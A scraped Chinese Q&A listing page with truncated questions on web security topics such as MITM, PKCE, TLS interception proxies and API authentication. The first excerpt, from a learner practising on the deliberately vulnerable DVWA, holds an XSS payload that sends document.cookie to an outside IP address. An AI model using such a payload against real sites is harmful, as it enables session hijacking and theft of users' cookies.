3回答
我正在学习xss利用这个名为“该死的易受攻击的web应用”的web应用程序,在这里发现了,它故意包含web漏洞。
我正在尝试将javascript添加到像下面这样的消息框中
它只接受一定数量的文字,然后不允许超过这一点,这不允许我继续进行xss攻击。我试图在消息框中键入以下内容:
<script>new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;</script>
下面是处理消息和名称文本区域的php脚本
<?php
if(isset($_POST[
浏览 4提问于2014-01-01得票数 0
回答已采纳
供应商开发了一个网站,该网站目前位于企业管理的Amazon Web Services (AWS)环境中。但是,供应商拥有该网站的域名。
该网站是一个电子商务平台,允许用户提交购买保险产品的个人信息。
我想知道域名所有者在技术上是否有可能将表单提交重定向到不同的服务器(而企业并不知道)。谢谢!
浏览 2提问于2019-04-19得票数 0
2回答
我不想让花花公子来捕捉我的web应用程序活动。我想让我的应用程序更安全,就像银行网站.while一样,使用网上银行网站,小提琴手无法捕捉到细节。如何在asp.net web应用程序中使用C#.net。
浏览 2提问于2016-01-06得票数 2
1回答
我尝试根据useragent更改视图的前缀。
如果请求来自IE,则尝试将其转发到“旧式”文件夹,否则是“现代”文件夹。
@Bean
public ViewResolver viewResolver() {
InternalResourceViewResolver internalResourceViewResolver = new InternalResourceViewResolver();
internalResourceViewResolver.setViewClass(JstlView.class);
internalResour
浏览 1提问于2017-09-29得票数 1
回答已采纳
我是Struts2框架的新手。我想利用这个框架。所以我想知道我们如何使用Struts2框架提供更好的安全性,或者它如何更安全?
浏览 1提问于2014-08-21得票数 0
我试图在Windows Service中运行web.application,但在application.run()之后,我找不到一种编程方式来停止它。
我试过sys.exit,但它在Windows Service上不能很好地工作。
浏览 1提问于2011-03-22得票数 3
在浏览有关web应用程序漏洞的材料时,我遇到了一些查询。这是细节。
诸如burp、APPScan之类的工具根据来自应用服务器的特定响应头报告漏洞。据我所知,有些标题是相互补充的。对于Ex:-“内容-类型”和“X-内容-类型-选项”。如果第二个设置为“nosniff”,浏览器将根本不会嗅探响应主体,并将遵守在“内容-类型”标题中设置的值。类似地,HTTP请求还可以使用“接受”类型的头来指示它期望的响应类型。在这种情况下,如果没有将“X-Content Options”设置为“nosniff”,而对此类响应的请求具有“接受”参数,仅指示媒体类型为文本/纯文本,我是否需要考虑应用程序易受攻击?
浏览 0提问于2016-07-25得票数 1
Tomcat支持将令牌附加到URL的CSRF过滤器。这不会暴露令牌吗?看起来这不是一个安全的解决方案。我说的对吗?
浏览 1提问于2016-10-05得票数 1
通过设计,JavaScript和Flash之间的JavaScript调用是否驻留在同一个HTML容器中(在客户端)?
它能被设计拦截吗?
提示: ExternalInterface API引用(上面)读取
ExternalInterface类要求用户的web浏览器支持ActiveX或某些浏览器为插件脚本公开的NPRuntime API。见。
谢谢
浏览 0提问于2012-08-15得票数 2
回答已采纳
我正在寻找最简单的方法来阻止我的squid代理上的网站。我已经考虑过squidguard,但我更喜欢让它尽可能简单,根据一天中的时间屏蔽/解除屏蔽极少的网站。
我已经创建了一个包含要阻止的URL的ACL,其中包含以下行
acl bad_url dstdomain "/etc/squid/bad_url.squid"
http_access deny bad_url
我使用sed命令从crontab中删除了这些行,它按计划工作。然而,通过HTTPS访问网站仍然有效。
在Squid中有什么解决方案吗?
浏览 5提问于2012-05-22得票数 0
回答已采纳
在PKCE中,我了解到code_verifier用于生成代码挑战,随后授权服务器验证此code_verifier值以完成PKCE过程。
这个code_verfier值有多敏感?这个价值一定要保密吗?如果这个值被泄露,敌人能执行什么攻击?
浏览 1提问于2019-04-10得票数 5
回答已采纳
我能否通过HSTS网站的BIPSu套CA证书截获请求,这是否安全?
浏览 0提问于2017-01-13得票数 0
1回答
我想保护一个.NET Web服务。我将使用SSL,但我还需要限制每个用户可以根据用户的权限调用的Web调用。
据我所读,REST/HTTP应该是无状态的,所以从技术上讲,您不应该能够维护任何会话状态,但是这里有。
一种是使用。凭据随每一个请求一起发送。虽然这可能在安全性方面是好的,因为它们无论如何都是通过SSL传输的,但是考虑到每次根据数据库重新进行身份验证需要大量的开销,这实在是不切实际的。(一种可能是将它们缓存在内存中,但我怀疑这是最好的方法。)
另一种方法是使用 ()来控制对API调用的访问。在这个中有一条评论说:
为了让那些在HTTPS服务上实现这一功能的人明白:您不需要在SSL上实
浏览 5提问于2014-04-03得票数 1
回答已采纳
2回答
我们有一个安卓应用程序,它向web服务发送一些数据,然后web服务将其保存在MySQL数据库中。我们希望避免人们使用web服务,如果它不是来自应用程序本身。我的意思是,我们希望确保没有人能够对我们的应用程序执行MITM攻击,然后从其他地方向我们的web服务发送请求。
我们想出了下一个想法:
我们在Android应用程序和web服务上都包含一个密码,然后在每个对web服务的请求中使用这样的口令和当前时间戳生成一个令牌:
// Pseudo
String token = md5(private_passphrase + (timestamp / 60));
然后将生成的令牌发送到web服务,web
浏览 0提问于2015-04-14得票数 2
回答已采纳
1回答
在工作中,我支持NTLM的代理。当SSL Poodle漏洞出现时,我强化了私有服务器的配置,并发现即使客户机和服务器共享公共密码,一些配置也会导致握手失败。我怀疑代理修改了支持的密码列表。今天,当我经常访问的一个网站停止工作时,这个问题再次浮出水面,说连接被降级为TLS的一个版本,低于服务器所要求的最低要求,而我的web浏览器不会这么做。
所以我想知道,如果一个公司的代理不是试图削弱和监视一种联系,它为什么会这样做呢?我检查了证书,它不试图通过签发假证书来进行MITM攻击。那又有什么意义呢?如果我仍然设法获得SSL连接,我是否应该认为它是安全的?
编辑:看到评论,我又检查了一遍。证书链和指纹与
浏览 0提问于2015-01-19得票数 1
回答已采纳
1回答
我正在尝试做一个服务,当用户触摸屏幕上的任何地方时,它会显示一个按钮。
我寻找了很多类似的话题,但目前还不能成功。
我试图显示一个带有TYPE_SYSTEM_OVERLAY和一些标志的布局,但我无法在我的服务上获得任何touchEvent。
相反,我尝试了TYPE_TOAST、TYPE_PHONE、TYPE_SYSTEM_ALERT,但通过这些,我可以在我的服务上运行touchEvent,但不能在当前活动上运行。
有没有人有一个解决方案,可以在服务上获得touchEvent,同时仍然在覆盖下执行操作?
浏览 10提问于2018-02-21得票数 0
回答已采纳
我想知道如何在生产环境中运行在同一工作站上的两个应用程序之间安全地设置HTTPS:
本地服务器应用程序(C#)
通过浏览器访问本地服务器的web前端(打包为应用程序,使用电子并通过HTTPS与本地服务器对话)
用户向web前端输入用户名和密码,通过HTTPS将详细信息转发给本地服务器。在这种情况下,服务器充当提供实际身份验证的在线API的代理。
应用程序都将由而不是工作站上的本地管理员的用户运行。注意,本地管理员是可信的。
我目前的计划是:
为HTTPS生成自签名证书和密钥存储。
在安装应用程序时,它将作为管理员运行,在OS可信证书存储中安装自签名证书。
将keystore捆绑在本地服务器应用
浏览 0提问于2021-02-11得票数 2
回答已采纳
1回答
可能重复: 英国政府提出的互联网监控设备如何“绕过”加密?
如果我设置了一个服务器(称为服务器1),通过SSL接收来自另一个服务器(服务器2)的POST数据,然后服务器1处理POST数据,那么有什么可以阻止MITM截获整个SSL有效负载,然后在以后一次将其发送到服务器1?
我意识到MITM将无法看到或修改数据,但他们不能继续将其发送到服务器1并使它做一些我们不想做的事情吗?
浏览 0提问于2012-07-27得票数 -1
回答已采纳
2回答
最近,我们的网络应用程序已经通过了审核。审计师得出如下结论:
尽管SSL已经实现和实施,但这只意味着存在网络加密(也就是说,如果有人使用网络嗅探工具,数据将不会以明文形式出现)。然而,在端点--意思是客户机工作站--可能被代理或监视工具篡改了。如果是这样的话,在登录期间不实现应用程序加密或更改/重置密码将允许在明文中看到用户凭据。
是否有任何标准程序/实践可用于解决此类安全问题?客户端JavaScript加密/哈希值值得考虑吗?
注:这是一个JavaEE应用程序(Struts+EJB),只处理数据检索( i,e查询系统)。
浏览 7提问于2015-01-23得票数 1
我们正在尝试建立一个安卓移动应用程序,将使用PKCE2.0授权码流与OAuth。
在阅读更多关于这方面的内容时,我发现我们必须传递重定向URL,在那里它将返回一个code。对于web应用程序,让URL重定向是有意义的,但我们如何才能将其用于移动应用程序。
一些同事建议使用应用内浏览器来完成这项工作。但是我根本不想在我的应用程序中使用浏览器。
有没有人能建议一下实现这一点的最佳方法。
浏览 2提问于2019-08-19得票数 0
1回答
当您通过ajax发布表单时,您可以在那里读取纯文本形式的密码。我认为这是安全问题。例如,在firebug控制台中隐藏密码或禁止读取密码有哪些可能性?
浏览 1提问于2012-10-23得票数 0
回答已采纳
在以下情况下,风险是什么?
银行希望在客户登录到她的在线/移动银行平台后,使用ATM密码(借记卡和/或信用卡)作为一种额外的身份验证形式。
由于银行拥有这些卡,它可以选择以它想要的方式使用ATM密码,因此它不违反任何合规要求。
另外,假设所有的卡都使用EMV,即芯片和引脚。
如果罪犯偷走了所有的自动取款机别针,他们能用它做什么呢?在这种情况下,银行的风险敞口是多少?
浏览 0提问于2018-01-16得票数 3
web上的大多数API提供了两种方法:
refresh_tokenrefreshToken:登录:给定凭据,返回access_token和refresh_token,返回另一个access_token和一个新的refres_token.
我的问题是:为什么如此广泛地倾向于进行登录,然后是一个可能的周期性refreshToken序列,而不是在访问令牌过期时再次登录呢?
刷新与完全登录相比有哪些好处?
浏览 0提问于2019-10-15得票数 0
回答已采纳
我想知道Sweet32和Lucky13有多脆弱?我的意思是,攻击者多久使用这些漏洞来获得访问权限?
浏览 0提问于2020-02-11得票数 5
回答已采纳
我是一个新的web开发新手,不完全了解加密在web上的工作原理。我在hltv.org网站上摆弄着Crome Dev工具。我注意到,当我登录时,它会向/login发送一个post请求,并在请求正文中显示我的密码和用户名。此信息是否对可以拦截post请求的任何人可见,或者只对我可见?我是否对https请求中的信息加密方式有误解?
浏览 0提问于2019-08-22得票数 0
3回答
我有一个小型的办公室网络,大约有10个工作站和一个物理域控制器。我想把它移到云端。为此,我在Azure上部署了一个Windows,我将把它作为一个额外的DC来推广。然后,我会关闭物理的那一个。
目前物理服务器还充当VPN服务器,云VM通过该VPN与L2TP和IPSec连接到本地办公网络。当我关闭物理服务器时,它也会杀死VPN。
我考虑向办公室公开云VM本身,而不是从它启动一个连接。在Azure上,我有能力将VM暴露给来自Internet上单个IP地址的所有流量。这样我就可以使用办公室的外部静态IP和工作站能够与云DC通信。
我的问题是,在这个过程中涉及到哪些实际的安全风险?即使我只将它暴露在一
浏览 0提问于2018-08-11得票数 0
回答已采纳
1回答
如果我有一个用于登录的rest端点,它与常见的语义不匹配,比如随机UID
my_url.com/api/2lk3jh54kjhlkj34hhlkjhvaksjdv123
和类似的参数名,这是否使其相对安全?这是否有助于防止暴力登录尝试?
这是否可以替代被标记为暴力攻击的黑名单IP,或者可以很好地协同工作?
浏览 0提问于2017-04-29得票数 1
目前,我正在努力提高我编写的iOS应用程序和我编写的PHP之间的安全性。
似乎很重要的参数:
我用的是AFNetworking
我已经在使用HTTPS了
我已经在使用托管公司的Certs了
这是一个聊天/短信应用程序。不开账单。没有数据需要额外的预防措施。只有用户名和密码。
我正试图确定iOS应用程序的合理尽职调查是什么。
我读过关于oAuth 1a的文章(很多人似乎不喜欢oAuth2?)
oAuth体验的“消费者”部分(同时使用AFNetworking)似乎涉及到通过自定义URL协议访问web浏览器和返回应用程序的过程。对我来说那似乎很可怕。
我知道我无法控制哪个客户端正
浏览 0提问于2014-06-17得票数 1
回答已采纳
1回答
Apache :永久重定向不工作
、、、、
我已经在我们的域上部署了一个WAR文件,其中包含https。目前,问题是如果我点击以下域:
https://www.domain-name.com
domain-name.com
那我就没问题了,但只要我一试:
https://domain-name.com
我得到一个不可信的连接错误。为此,我决定在web.xml文件夹中添加一个urlrewrite.xml文件,并为web.xml添加以下设置:
urlrewrite.xml:
<urlrewrite>
<rule>
<from>https://domain-name.com</
浏览 2提问于2015-10-28得票数 2
正如标题所述,我从未真正理解过这一点。
据我所知,一个代理,无论是socks还是http,即使在httpS (ssl)下也可以显示数据包信息。然而,在mitm期间,这是不可能的。
这背后的机械原理是什么?代理设置是否也提交证书协商一致或握手信息?
浏览 0提问于2018-03-12得票数 -1
1回答
我有一个网站,用户可以选择一个文件从他们的本地机器,操作它,然后保存它。
该网站完全用JavaScript编写,以确保它是纯粹的客户端。用户选择的文件内容是否完全安全(从网站本身的角度来看,我知道用户可能在他们的本地机器上有恶意代码,等等)?
浏览 0提问于2019-09-19得票数 1
1回答
我有pfsense 2.3.2,我想让它通过限制器和web缓存作为流量控制器工作,但是这是一个错误限制器,在应用nat的地方不能工作。
因此,如果我有一台安装了pfsense的机器作为限制器,在lan与lan的接口充当web缓存之前,第二台机器就可以工作了。
第一台机器将控制流量,而第二台机器将缓存而不受第一台机器流量控制的影响。
我想从第二台机器中得到一个桥接和一个web缓存。
不改变源ip的web缓存,因此第一台机器可以基于lan ips(客户端)控制流量
互联网-第一台机器-第一台机器
浏览 0提问于2016-10-17得票数 0
1回答
中间的人是否使用代理来工作?我想这在企业网络中是可行的,管理员可以访问互联网,而在真正的网络中,如果一个人试图在PGW或GGSN上设置移动网络,代理会欺骗对方信任CA吗?
浏览 0提问于2017-04-24得票数 1
对指定的“远程IP”的任何传出数据包的加密过程:
对-original有效载荷P进行加密( IP报头后的字节),使用带有预先建立的密钥KEY的RC4来获得加密的有效载荷C=RC4(P, KEY)
将-The加密的有效载荷C与MD5(C|KEY)的16字节输出连接起来,并相应地调整IP报头(增加数据包的总长度,重新计算校验和),从而使出包具有有效载荷C | MD5(C|KEY)和目标“远程IP”。
来自指定“远程IP”的任何传入数据包的解密过程:
-Check用于MD5身份验证的分组有效载荷具有相同的给定“密钥”,将接收到的数据包有效载荷( IP报头后面的字节)除以C部分,其中A是分组有效负载的
浏览 0提问于2020-04-25得票数 1
回答已采纳
我有一个部署在数字海洋水滴上的应用程序。部署一天后,我的服务器崩溃了,最终的日志是这样的:
GET /vehicle/tank/all/1 304 2.965 ms - -
GET /vehicle/tank/all/1 304 2.582 ms - -
GET /vehicle/tank/all/1 304 1.735 ms - -
GET /vehicle/tank/all/1 304 1.566 ms - -
GET http://dhg.pisz.pl/httptest.php 404 1.771 ms - 43
GET http://dhg.pisz.pl/httptest.php
浏览 5提问于2016-01-09得票数 12
6回答
我正在进行一项研究与开发任务,以测试web应用程序中可能出现的安全漏洞。我想使用开源工具。
有许多类型的漏洞,如跨站点脚本、拒绝服务、文件访问、格式验证、大量分配、SQL注入、会话设置等。因此,我希望有一个最适合的跨平台工具,以最佳的方式进行渗透测试。
我读过网络应用程序的安全测试和开源安全测试工具,发现它很有用。但是,由于它是在一年前发布的,我想得到一个最新的答复。
浏览 0提问于2014-07-22得票数 3
1回答
我为我的一个客户实现了一个API,它依赖于非and和一个共享的秘密。结构:
客户的网站(CS)请求从我的应用程序(MA)现在,张贴他们的用户名
MA验证用户名是否有效,然后在响应中生成一个nonce
现在只对给定的用户名有效,并且只有效1分钟。
CS使用nonce进行用户API调用;文章如下所示:
用户名、nonce (来自步骤2)、cnonce (由CS生成)、有效负载(有用的API调用)和散列(它是sha1散列)、有效负载、共享秘密和客户端名。
MA确认该名称对于给定的用户名是有效的(然后使该名称无效,以便以后使用),然后使用给定用户名的共享秘密以及该名称,并提供客户端名称来散列有效负
浏览 0提问于2011-11-17得票数 8
回答已采纳
我对iOS密钥链的理解是,在越狱设备上是不安全的。
我想知道是否有人使用kSecAccessControlTouchIDAny存储密钥链中的值,就像在中使用的那样,是否存在额外的保护级别,甚至在越狱设备上也是如此?
将文本存储到密钥链中的示例的相关摘录:
- (void)addTouchIDItemAsync {
CFErrorRef error = NULL;
// Should be the secret invalidated when passcode is removed? If not then use kSecAttrAccessibleWhenUnlocked
SecAcce
浏览 4提问于2016-02-02得票数 1
回答已采纳
我想设置一些基本的web服务器保护,以防止重放攻击和数据操纵黑客攻击。目前,我从客户端(android)发出了一个REST请求,例如:
http://www.example.com/add_book.php?user_name=eddy&nonce=534365756756&book_title=My%20First%20Book
在这里,我使用了一个nonce,它将根据用户的id进行存储,并检查重复的请求。然而,在这个未加密的系统中,某人可以简单地插入他们自己的(随机) nonce。我想要做的是将上面的请求转换为类似以下内容的内容:
http://www.example.co
浏览 2提问于2014-08-06得票数 0
1回答
我的无线传感器节点和网关应用程序使用时间戳作为非not,并保证不同的消息使用不同的非not,这样安全就不会受到损害。
如果网关由于某些原因不包括丢弃带有旧时间戳的数据包的逻辑,则可以向其发送重放攻击。有利的是,如果网关关机,传感器也可以在稍后重新发送相同的数据包。假设传感器无法将数据包传送到网关,但是一个窃听者捡起了它。
如果窃听者出于某种原因想重播这个消息,它实际上会帮到系统的忙,就像我看到的那样。
如果传感器只发送带有时间戳的传感器数据样本,那么可以说重放攻击是无懈可击的吗?
如果“传感器”包括一个按钮来打开或关闭某个东西(实时功能),你可以丢弃带有旧时间戳的数据包。
假设一个计数器被用作
浏览 0提问于2019-09-24得票数 1
1回答
我们正在设计一个仅可通过https访问的web,但我们的团队中似乎出现了两种思想流派:
第一组希望采用一种比MITM攻击更关心数据泄漏的方法:
密码将在清空的请求中发送(但MITM将因此能够恢复用户的密码)。
密码将在DB (bcrypt)中以不可逆的方式被混淆.
第二组认为MITM攻击的风险大于数据泄漏的风险。因此:
密码将以摘要形式发送请求,因此无法由MITM恢复。
由于使用摘要,需要在服务器上恢复原始密码,以便可以重新创建摘要。因此,密码将被加密存储在数据库中。
虽然完全安全显然是不可能的,但是否有第三种方法可以使两者兼得呢?虽然第一组S的做法似乎很正统,但第二组S有多普遍呢?
浏览 0提问于2013-11-06得票数 2
1回答
是否有可能隐藏表单数据或控制器值在web中,我需要隐藏用户名和密码时,登录im目前为我的网站安全工作。但不幸的是,每次我请求ajax调用时,在签入的工具之后,如果您进入网络浏览ajax调用,它会显示我的密码和用户名。是否有某些代码可以为我隐藏敏感数据?
浏览 3提问于2013-10-07得票数 2
回答已采纳
1回答
我将开发一个web应用程序,我很可能会使用Angular2来实现它。由于应用程序需要将数据存储在服务器上,所以我需要一个后端,web应用程序可以使用这个后端进行读写。
但是,如何防止其他人在我的web应用程序之外使用它呢?这看起来不可能吗?我在前端使用的任何硬编码令牌、API密钥等都将通过查看源对攻击者来说是可见的。即使通过混淆和缩小JS源代码可以使其变得更加困难,也永远不会以这种方式使其100%安全,对吗?
那么,我如何创建一个可供web应用程序前端使用的后端,同时将它的使用限制在我自己的前端?
如果这是不可能的,它是否有可能在某些特定的条件下,例如,如果web前端是从同一服务器上运行的后端
浏览 3提问于2017-03-18得票数 3
我妈妈有一部Android手机,在16:30左右掉进水里几秒钟。她设法把电话拆开关了。我们共享一个端到端加密的组(所有参与者都有新的WhatsApp版本)。同一天,大约21点,她的手机坏了,我给这个小组发了条信息。第二天,她把手机带到一家修理店,他们换了一些零件,手机又恢复了生机。一拿到手机,我就注意到它已经被工厂重置了,所有的应用程序都消失了,新的Android版本,没有定制,没有文件,没有wi密码,完全空白。于是我开始为她重新安装WhatsApp,输入她的号码,希望看到她的旧组,但没有留言。令我惊讶的是,她收到了所有的信息,包括我自己的,在手机死后,在工厂复位之前,他们收到了这些信息。
我
浏览 0提问于2016-06-16得票数 10
回答已采纳
1回答
我有一个桌面应用程序,需要与远程服务器安全地通信。
所有数据都必须加密。
这也意味着数据不能被第三方更改。
没有人应该能够重新发送相同的数据两次(重放攻击)
列表项目
服务器是使用restful设置的,因此桌面客户端将进行https调用(get、post、push和delete)。
我知道SSL证书是不够的。有些工具,如,将退出证书并显示攻击者纯文本。
我的问题不是一般的加密的。我想知道在现实世界中,提供完美的前向保密最常用的做法是什么?!
如果服务器是用python编写的,而客户机是用java编写的,那么我可以查看教程或库吗?
浏览 3提问于2014-03-10得票数 1
回答已采纳
1回答
我想为Windows开发一个基于主机的防火墙,主要是从HTTPS开始过滤URL!我知道微软正在将WFP作为对旧技术的替代,例如防火墙/过滤器挂钩、NDIS、TDI、WSA和Winsock 2 (LSP)。但是WFP目前不支持带有主机名或URL的过滤器。此外,WFP只使用C/C++,而.NET中也没有可用的.NET包装器。
我尝试了@basil的演示应用程序webfilter,它在TCP端口80 (默认HTTP)上解析IPv4出站流量中的数据包,重置服务器连接(TCP RST),并向客户端(浏览器)发送一个HTML (浏览器),然后再发送一个TCP FIN,以防IPv4匹配文本文件中任何作为命令
浏览 2提问于2014-04-18得票数 3
回答已采纳
3回答
TLS拦截代理动态创建假服务器公钥和私钥,并使用根CA对它们进行签名。根据软件的不同,可以在每个新连接上缓存或重新生成密钥。
窃取(短暂的)服务器密钥(而不是用于签名的根CA的密钥)会带来什么安全影响?最终,密钥只会在握手时使用,所以只有当密钥被重用/缓存时才会出现问题?
浏览 0提问于2021-10-02得票数 1
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频活动推荐
腾讯云开发者
